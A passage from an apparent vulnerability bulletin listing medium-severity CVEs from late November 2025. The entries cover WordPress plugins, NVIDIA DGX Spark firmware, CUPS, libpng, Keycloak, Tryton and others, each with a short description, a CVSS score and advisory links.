| n/a--ZenTao | A flaw has been found in ZenTao up to 21.7.6-8564. The affected element is the function file::delete of the file module/file/control.php of the component File Handler. Executing manipulation of the argument fileID can lead to improper privilege management. It is possible to launch the attack remotely. Upgrading to version 21.7.7 is sufficient to fix this issue. You should upgrade the affected component. | 2025-11-30 | 5.4 | CVE-2025-13787 | VDB-333791 | ZenTao File control.php delete privileges management VDB-333791 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689892 | Zentao PMS <=21.7.6-85642 Privilege Escalation https://github.com/ez-lbz/ez-lbz.github.io/issues/1 https://github.com/ez-lbz/ez-lbz.github.io/issues/1#issuecomment-3540423868 https://www.zentao.net/extension-buyext-1601-download.html |
| nextendweb--Nextend Social Login and Register | The Nextend Social Login and Register plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.21. This is due to missing or incorrect nonce validation on the 'unlinkUser' function. This makes it possible for unauthenticated attackers to unlink the user's social login via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-28 | 4.3 | CVE-2025-13737 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9c6b747e-d267-4fd3-a4fd-022aa657c796?source=cve https://plugins.trac.wordpress.org/browser/nextend-facebook-connect/tags/3.1.21/includes/provider.php#L772 https://plugins.trac.wordpress.org/changeset/3404174/nextend-facebook-connect/trunk/includes/provider.php |
| nmedia--Admin and Customer Messages After Order for WooCommerce: OrderConvo | The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `get_order_by_id()` function in all versions up to, and including, 14. This makes it possible for unauthenticated attackers to view sensitive WooCommerce order details and private conversation messages between customers and store administrators for any order by supplying an arbitrary order ID. | 2025-11-25 | 5.3 | CVE-2025-13389 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9149d2c6-b6c7-430d-8886-c8c5de483220?source=cve https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L142 https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L142 |
| nmedia--Admin and Customer Messages After Order for WooCommerce: OrderConvo | The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 14. This is due to a flawed permission check in the REST API permission callback that returns true when no nonce is provided. This makes it possible for unauthenticated attackers to impersonate any WordPress user and inject arbitrary messages into any WooCommerce order conversation by directly calling the REST endpoint with controlled user_id, order_id, and context parameters. | 2025-11-25 | 4.3 | CVE-2025-13452 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2c1dd87c-cc28-43b3-8378-4583dc6de195?source=cve https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L56 https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L56 https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L113 https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L113 |
| nmedia--Frontend File Manager Plugin | The Frontend File Manager Plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 23.4. This is due to the plugin not validating file ownership before processing file rename requests in the '/wpfm/v1/file-rename' REST API endpoint. This makes it possible for authenticated attackers, with Subscriber-level access and above, to rename files uploaded by other users via the 'fileid' parameter. | 2025-11-25 | 4.3 | CVE-2025-13382 | https://www.wordfence.com/threat-intel/vulnerabilities/id/aa8d5feb-2ae9-44b8-90b5-9fc67226855a?source=cve https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.4/inc/classes/class.rest.php#L20 https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.4/inc/classes/class.rest.php#L52 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware where an attacker could cause an out-of-bound write. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, or escalation of privileges. | 2025-11-25 | 6.7 | CVE-2025-33190 | https://nvd.nist.gov/vuln/detail/CVE-2025-33190 https://www.cve.org/CVERecord?id=CVE-2025-33190 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in OSROOT firmware, where an attacker could cause an invalid memory read. A successful exploit of this vulnerability might lead to denial of service. | 2025-11-25 | 5.7 | CVE-2025-33191 | https://nvd.nist.gov/vuln/detail/CVE-2025-33191 https://www.cve.org/CVERecord?id=CVE-2025-33191 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause an arbitrary memory read. A successful exploit of this vulnerability might lead to denial of service. | 2025-11-25 | 5.7 | CVE-2025-33192 | https://nvd.nist.gov/vuln/detail/CVE-2025-33192 https://www.cve.org/CVERecord?id=CVE-2025-33192 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause improper validation of integrity. A successful exploit of this vulnerability might lead to information disclosure. | 2025-11-25 | 5.7 | CVE-2025-33193 | https://nvd.nist.gov/vuln/detail/CVE-2025-33193 https://www.cve.org/CVERecord?id=CVE-2025-33193 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause improper processing of input data. A successful exploit of this vulnerability might lead to information disclosure or denial of service. | 2025-11-25 | 5.7 | CVE-2025-33194 | https://nvd.nist.gov/vuln/detail/CVE-2025-33194 https://www.cve.org/CVERecord?id=CVE-2025-33194 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause unexpected memory buffer operations. A successful exploit of this vulnerability might lead to data tampering, denial of service, or escalation of privileges. | 2025-11-25 | 4.4 | CVE-2025-33195 | https://nvd.nist.gov/vuln/detail/CVE-2025-33195 https://www.cve.org/CVERecord?id=CVE-2025-33195 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause a resource to be reused. A successful exploit of this vulnerability might lead to information disclosure. | 2025-11-25 | 4.4 | CVE-2025-33196 | https://nvd.nist.gov/vuln/detail/CVE-2025-33196 https://www.cve.org/CVERecord?id=CVE-2025-33196 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause a NULL pointer dereference. A successful exploit of this vulnerability might lead to denial of service. | 2025-11-25 | 4.3 | CVE-2025-33197 | https://nvd.nist.gov/vuln/detail/CVE-2025-33197 https://www.cve.org/CVERecord?id=CVE-2025-33197 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| Open-Xchange GmbH--OX App Suite | Malicious e-mail content can be used to execute script code. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Sanitization has been updated to avoid such bypasses. No publicly available exploits are known | 2025-11-27 | 6.1 | CVE-2025-59025 | https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json |
| Open-Xchange GmbH--OX App Suite | Malicious content uploaded as file can be used to execute script code when following attacker-controlled links. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known | 2025-11-27 | 5.4 | CVE-2025-30186 | https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json |
| Open-Xchange GmbH--OX App Suite | Malicious content at office documents can be used to inject script code when editing a document. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known | 2025-11-27 | 5.4 | CVE-2025-30190 | https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json |
| Open-Xchange GmbH--OX App Suite | Malicious content uploaded as file can be used to execute script code when following attacker-controlled links. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known | 2025-11-27 | 5.4 | CVE-2025-59026 | https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json |
| OpenPrinting--cups | OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. Prior to version 2.4.15, a user in the lpadmin group can use the cups web ui to change the config and insert a malicious line. Then the cupsd process which runs as root will parse the new config and cause an out-of-bound write. This issue has been patched in version 2.4.15. | 2025-11-29 | 6 | CVE-2025-61915 | https://github.com/OpenPrinting/cups/security/advisories/GHSA-hxm8-vfpq-jrfc https://github.com/OpenPrinting/cups/commit/db8d560262c22a21ee1e55dfd62fa98d9359bcb0 https://github.com/OpenPrinting/cups/releases/tag/v2.4.15 |
| OpenPrinting--cups | OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. Prior to version 2.4.15, a client that connects to cupsd but sends slow messages, e.g. only one byte per second, delays cupsd as a whole, such that it becomes unusable by other clients. This issue has been patched in version 2.4.15. | 2025-11-29 | 5.1 | CVE-2025-58436 | https://github.com/OpenPrinting/cups/security/advisories/GHSA-8wpw-vfgm-qrrr https://github.com/OpenPrinting/cups/commit/40008d76a001babbb9beb9d9d74b01a86fb6ddb4 https://github.com/OpenPrinting/cups/releases/tag/v2.4.15 |
| oscaruh--Google Drive upload and download link | The Google Drive upload and download link plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' parameter of the 'atachfilegoogle' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-27 | 6.4 | CVE-2025-12666 | https://www.wordfence.com/threat-intel/vulnerabilities/id/14ee4247-4cfe-440b-add2-d5d840b1f114?source=cve https://plugins.trac.wordpress.org/browser/google-drive-upload-and-download-link/tags/1.0/pickergoogledirve.php#L27 https://wordpress.org/plugins/google-drive-upload-and-download-link/ |
| ov3rkll--ProjectList | The ProjectList plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 0.3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-25 | 4.9 | CVE-2025-13370 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e424d27b-f719-4fbf-b4eb-83b42130666c?source=cve https://it.wordpress.org/plugins/projectlist/ https://plugins.trac.wordpress.org/browser/projectlist/trunk/pages/pl-add.php#L61 https://plugins.trac.wordpress.org/browser/projectlist/tags/0.3.0/pages/pl-add.php#L61 |
| Oxide--Omicron | In Oxide control plane 15 through 17 before 17.1, API tokens can be renewed past their expiration date. | 2025-11-30 | 5 | CVE-2025-66432 | https://docs.oxide.computer/security/advisories/20251117-1 https://oxide.computer/ https://github.com/oxidecomputer/omicron/compare/01bb875...ec069f0 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to version 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_do_quantize function when processing PNG files with malformed palette indices. The vulnerability occurs when palette_lookup array bounds are not validated against externally-supplied image data, allowing an attacker to craft a PNG file with out-of-range palette indices that trigger out-of-bounds memory access. This issue has been patched in version 1.6.51. | 2025-11-24 | 6.1 | CVE-2025-64505 | https://github.com/pnggroup/libpng/security/advisories/GHSA-4952-h5wq-4m42 https://github.com/pnggroup/libpng/pull/748 https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_write_image_8bit function when processing 8-bit images through the simplified write API with convert_to_8bit enabled. The vulnerability affects 8-bit grayscale+alpha, RGB/RGBA, and images with incomplete row data. A conditional guard incorrectly allows 8-bit input to enter code expecting 16-bit input, causing reads up to 2 bytes beyond allocated buffer boundaries. This issue has been patched in version 1.6.51. | 2025-11-24 | 6.1 | CVE-2025-64506 | https://github.com/pnggroup/libpng/security/advisories/GHSA-qpr4-xm66-hww6 https://github.com/pnggroup/libpng/pull/749 https://github.com/pnggroup/libpng/commit/2bd84c019c300b78e811743fbcddb67c9d9bf821 |
| pr-gateway--Blog2Social: Social Media Auto Post & Scheduler | The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'deleteUserCcDraftPost' function in all versions up to, and including, 8.7.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the status of arbitrary posts to trash. | 2025-11-25 | 5.4 | CVE-2025-13558 | https://www.wordfence.com/threat-intel/vulnerabilities/id/61b590f5-7854-42f7-b5e2-e6feaaf03a73?source=cve https://plugins.trac.wordpress.org/browser/blog2social/tags/8.7.0/includes/Ajax/Post.php#L1858 https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php?rev=3401934#L1867 |
| presstigers--Simple Folio | The Simple Folio plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'portfolio_name' parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-27 | 6.4 | CVE-2025-12151 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5c7b9827-59a7-4a8f-88d5-0b27c3ea2925?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3401878%40simple-folio&new=3401878%40simple-folio&sfp_email=&sfph_mail= |
| qodeinteractive--QODE Wishlist for WooCommerce | The QODE Wishlist for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2.7 via the 'qode_wishlist_for_woocommerce_wishlist_table_item_callback' function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to update the public view of arbitrary wishlists. | 2025-11-27 | 5.3 | CVE-2025-13157 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b15d1992-ecf9-4253-b832-056b34f42b48?source=cve https://plugins.trac.wordpress.org/browser/qode-wishlist-for-woocommerce/trunk/inc/wishlist/shortcodes/wishlist-table/helper-ajax.php#L95 https://plugins.trac.wordpress.org/changeset/3402469/ |
| quadlayers--Perfect Brands for WooCommerce | The Perfect Brands for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the `brands` attribute of the `products` shortcode in all versions up to, and including, 3.6.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-24 | 6.5 | CVE-2025-10144 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f4618bfd-77d9-4396-b041-d7ba0f6ec75a?source=cve https://plugins.trac.wordpress.org/browser/perfect-woocommerce-brands/tags/3.6.0/lib/class-woocommerce.php#L112 |
| quadlayers--Search Exclude | The Search Exclude plugin for WordPress is vulnerable to unauthorized modification of data due to a insufficient capability check on the Base::get_rest_permission() method in all versions up to, and including, 2.5.7. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify plugin settings, such as adding arbitrary posts to the search exclusion list. | 2025-11-25 | 4.3 | CVE-2025-10646 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b0f62d05-84fb-4cd6-9e5f-0dcfa305ce68?source=cve https://plugins.trac.wordpress.org/changeset/3379004/search-exclude |
| realin--wp-twitpic | The wp-twitpic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters of the 'twitpic' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-27 | 6.4 | CVE-2025-12670 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bb36fd27-bcea-481c-a7aa-815dc684ed8b?source=cve https://wordpress.org/plugins/wp-twitpic/ https://plugins.trac.wordpress.org/browser/wp-twitpic/tags/1.0/wp-twitpic.php#L42 |
| Red Hat--Red Hat build of Keycloak 26.2 | A flaw was found in the Keycloak LDAP User Federation provider. This vulnerability allows an authenticated realm administrator to trigger deserialization of untrusted Java objects via a malicious LDAP server configuration. | 2025-11-25 | 5.5 | CVE-2025-13467 | RHSA-2025:22088 RHSA-2025:22089 RHSA-2025:22090 RHSA-2025:22091 https://access.redhat.com/security/cve/CVE-2025-13467 RHBZ#2416038 |
| Red Hat--Red Hat OpenStack Platform 13 (Queens) | The mistral-dashboard plugin for openstack has a local file inclusion vulnerability through the 'Create Workbook' feature that may result in disclosure of arbitrary local files content. | 2025-11-26 | 6.5 | CVE-2021-4472 | https://access.redhat.com/security/cve/CVE-2021-4472 https://bugs.launchpad.net/horizon/+bug/1931558 RHBZ#2417321 https://review.opendev.org/c/openstack/mistral-dashboard/+/800952 https://review.opendev.org/c/openstack/python-mistralclient/+/800950 |
| redaxo--redaxo | REDAXO is a PHP-based CMS. Prior to version 5.20.1, a reflected Cross-Site Scripting (XSS) vulnerability exists in the Mediapool view where the request parameter args[types] is rendered into an info banner without HTML-escaping. This allows arbitrary JavaScript execution in the backend context when an authenticated user visits a crafted link while logged in. This issue has been patched in version 5.20.1. | 2025-11-26 | 6.1 | CVE-2025-66026 | https://github.com/redaxo/redaxo/security/advisories/GHSA-x6vr-q3vf-vqgq https://github.com/redaxo/redaxo/commit/58929062312cf03e344ab04067a365e6b6ee66aa |
| rnags--Reuters Direct | The Reuters Direct plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'logoff' action in all versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to reset the plugin's settings. | 2025-11-27 | 5.3 | CVE-2025-12579 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4360f293-201c-40c1-9603-931d72cc79bc?source=cve https://wordpress.org/plugins/reuters-direct/ |
| rnags--Reuters Direct | The Reuters Direct plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.0. This is due to missing or incorrect nonce validation on the the 'class-reuters-direct-settings.php' page. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-27 | 4.3 | CVE-2025-12578 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0e98a899-1578-45bf-ba1d-92703e38abd9?source=cve https://wordpress.org/plugins/reuters-direct/ |
| shapedplugin--Quick View for WooCommerce | The Quick View for WooCommerce plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.17 via the 'wqv_popup_content' AJAX endpoint due to insufficient restrictions on which products can be included. This makes it possible for unauthenticated attackers to extract data from private products that they should not have access to. | 2025-11-27 | 5.3 | CVE-2025-12584 | https://www.wordfence.com/threat-intel/vulnerabilities/id/809472d5-1698-42da-b414-1dda40983a6e?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402213%40woo-quickview&new=3402213%40woo-quickview&sfp_email=&sfph_mail= |
| sigalitam--Just Highlight | The Just Highlight plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Highlight Color' setting in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the plugin's settings page. | 2025-11-25 | 4.4 | CVE-2025-13311 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d21187bc-5bd0-49b9-9ef2-6654263cd93c?source=cve https://plugins.trac.wordpress.org/browser/just-highlight/trunk/just-highlight.php#L169 https://plugins.trac.wordpress.org/browser/just-highlight/tags/1.0.3/just-highlight.php#L169 |
| SourceCodester--Online Student Clearance System | A flaw has been found in SourceCodester Online Student Clearance System 1.0. Impacted is an unknown function of the file /Admin/changepassword.php. This manipulation of the argument txtconfirm_password causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2025-11-24 | 4.7 | CVE-2025-13586 | VDB-333350 | SourceCodester Online Student Clearance System changepassword.php sql injection VDB-333350 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700130 | SourceCodester Online Student Clearance System 1.0 SQL Injection https://github.com/CaseyW33/CVE/issues/2 https://www.sourcecodester.com/ |
| sscovil--SortTable Post | The SortTable Post plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in the sorttablepost shortcode in all versions up to, and including, 4.2. This is due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page via mouse interaction. | 2025-11-27 | 6.4 | CVE-2025-12649 | https://www.wordfence.com/threat-intel/vulnerabilities/id/80c700fa-619f-4ffe-a09a-bcdae2f71a7d?source=cve https://plugins.trac.wordpress.org/browser/sorttable-post/tags/4.2/sorttablepost.php#L100 |
| sunarc--Refund Request for WooCommerce | The Refund Request for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_refund_status' function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update refund statuses to approved or rejected. | 2025-11-25 | 4.3 | CVE-2025-12634 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f15b4596-8e00-4e66-8b51-f49ede1ff307?source=cve https://wordpress.org/plugins/refund-request-for-woocommerce/ |
| taosir--WTCMS | A security flaw has been discovered in taosir WTCMS up to 01a5f68a3dfc2fdddb44eed967bb2d4f60487665. This affects the function check/uncheck/delete of the file application/Comment/Controller/CommentadminController.class.php of the component CommentadminController. The manipulation of the argument ids results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be exploited. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 6.3 | CVE-2025-13783 | VDB-333787 | taosir WTCMS CommentadminController CommentadminController.class.php delete sql injection VDB-333787 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #688838 | wtcms cms 1.0 SQL Injection Submit #688839 | wtcms cms 1.0 SQL Injection (Duplicate) https://www.yuque.com/shangu-vvuup/ydpg69/dd5zpygt7w5w4d19?singleDoc |
| themehunk--Wishlist for WooCommerce | The Wishlist for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.0.9 via several functions in class-th-wishlist-frontend.php due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to modify other user's wishlists | 2025-11-25 | 6.5 | CVE-2025-12040 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6d7c8f79-4dfd-4d6f-b533-dc7a5998dfc1?source=cve https://wordpress.org/plugins/th-wishlist/ |
| themesupport--Hide Category by User Role for WooCommerce | The Hide Category by User Role for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.3.1. This is due to a missing capability check on the admin_init hook that executes wp_cache_flush(). This makes it possible for unauthenticated attackers to flush the site's object cache via forged requests, potentially degrading site performance. | 2025-11-27 | 5.3 | CVE-2025-13441 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b05b0f6d-ffa4-40f4-b969-1153192c52d6?source=cve https://plugins.trac.wordpress.org/browser/hide-category-by-user-role-for-woocommerce/trunk/admin/admin-ui-setup.php#L165 https://plugins.trac.wordpress.org/browser/hide-category-by-user-role-for-woocommerce/tags/2.3.1/admin/admin-ui-setup.php#L165 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402760%40hide-category-by-user-role-for-woocommerce&new=3402760%40hide-category-by-user-role-for-woocommerce&sfp_email=&sfph_mail= |
| trustindex--Customer Reviews Collector for WooCommerce | The Customer Reviews Collector for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'email-text' parameter in all versions up to, and including, 4.6.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-11-27 | 6.1 | CVE-2025-12123 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6091e396-8cd8-4c56-89cb-7699adb3d798?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3389840%40customer-reviews-collector-for-woocommerce&new=3389840%40customer-reviews-collector-for-woocommerce&sfp_email=&sfph_mail= |
| Tryton--sao | Tryton sao (aka tryton-sao) before 7.6.9 allows XSS via an HTML attachment. This is fixed in 7.6.9, 7.4.19, 7.0.38, and 6.0.67. | 2025-11-30 | 5.4 | CVE-2025-66420 | https://discuss.tryton.org/t/security-release-for-issue-14290/8895 https://foss.heptapod.net/tryton/tryton/-/issues/14290 |
| Tryton--sao | Tryton sao (aka tryton-sao) before 7.6.11 allows XSS because it does not escape completion values. This is fixed in 7.6.11, 7.4.21, 7.0.40, and 6.0.69. | 2025-11-30 | 5.4 | CVE-2025-66421 | https://discuss.tryton.org/t/security-release-for-issue-14363/8951 https://foss.heptapod.net/tryton/tryton/-/issues/14363 |
| Tryton--trytond | Tryton trytond 6.0 before 7.6.11 does not enforce access rights for data export. This is fixed in 7.6.11, 7.4.21, 7.0.40, and 6.0.70. | 2025-11-30 | 6.5 | CVE-2025-66424 | https://discuss.tryton.org/t/security-release-for-issue-14366/8953 https://foss.heptapod.net/tryton/tryton/-/issues/14366 |
| Tryton--trytond | Tryton trytond before 7.6.11 allows remote attackers to obtain sensitive trace-back (server setup) information. This is fixed in 7.6.11, 7.4.21, 7.0.40, and 6.0.70. | 2025-11-30 | 4.3 | CVE-2025-66422 | https://discuss.tryton.org/t/security-release-for-issue-14354/8950 https://foss.heptapod.net/tryton/tryton/-/issues/14354 |
| Uniong--WebITR | WebITR developed by Uniong has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2025-11-28 | 6.5 | CVE-2025-13769 | https://www.twcert.org.tw/tw/cp-132-10538-6a26d-1.html https://www.twcert.org.tw/en/cp-139-10539-21f45-2.html |
| Uniong--WebITR | WebITR developed by Uniong has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2025-11-28 | 6.5 | CVE-2025-13770 | https://www.twcert.org.tw/tw/cp-132-10538-6a26d-1.html https://www.twcert.org.tw/en/cp-139-10539-21f45-2.html |
| Uniong--WebITR | WebITR developed by Uniong has an Arbitrary File Read vulnerability, allowing authenticated remote attackers to exploit Relative Path Traversal to download arbitrary system files. | 2025-11-28 | 6.5 | CVE-2025-13771 | https://www.twcert.org.tw/tw/cp-132-10538-6a26d-1.html https://www.twcert.org.tw/en/cp-139-10539-21f45-2.html |
| vithanhlam--Zweb Social Mobile ng Dng Nt Gi Mobile | The Zweb Social Mobile - Ứng Dụng Nút Gá»i Mobile plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'vithanhlam_zsocial_save_messager', 'vithanhlam_zsocial_save_zalo', 'vithanhlam_zsocial_save_hotline', and 'vithanhlam_zsocial_save_contact' parameters in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-11-25 | 4.4 | CVE-2025-12032 | https://www.wordfence.com/threat-intel/vulnerabilities/id/26d12c52-d08f-4a6c-ba59-0e26dfb33ae5?source=cve https://wordpress.org/plugins/zweb-social-mobile/ |
| webgarh--Peer Publish | The Peer Publish plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on the website management pages. This makes it possible for unauthenticated attackers to add, modify, or delete website configurations via a forged request granted they can trick an administrator into performing an action such as clicking on a link. | 2025-11-25 | 4.3 | CVE-2025-12587 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fffa6c31-8da0-48d7-b603-64f50950787b?source=cve https://plugins.trac.wordpress.org/browser/peer-publish/tags/1.0/admin/admin-pages/newwebsite.php#L17 https://plugins.trac.wordpress.org/browser/peer-publish/tags/1.0/admin/admin-pages/websites.php#L20 |
| winston-dsouza--Ecommerce-Website | A weakness has been identified in winston-dsouza Ecommerce-Website up to 87734c043269baac0b4cfe9664784462138b1b2e. Affected by this issue is some unknown functionality of the file /includes/header_menu.php of the component GET Parameter Handler. Executing manipulation of the argument Error can lead to cross site scripting. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 4.3 | CVE-2025-13793 | VDB-333797 | winston-dsouza Ecommerce-Website GET Parameter header_menu.php cross site scripting VDB-333797 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691622 | ecommerce-website-master web 1 XSS vulnerability https://github.com/dream357/report/blob/main/ecommerce-website.docx |
| Wireshark Foundation--Wireshark | BPv7 dissector crash in Wireshark 4.6.0 allows denial of service | 2025-11-26 | 5.5 | CVE-2025-13674 | https://www.wireshark.org/security/wnpa-sec-2025-05.html GitLab Issue #20770 |
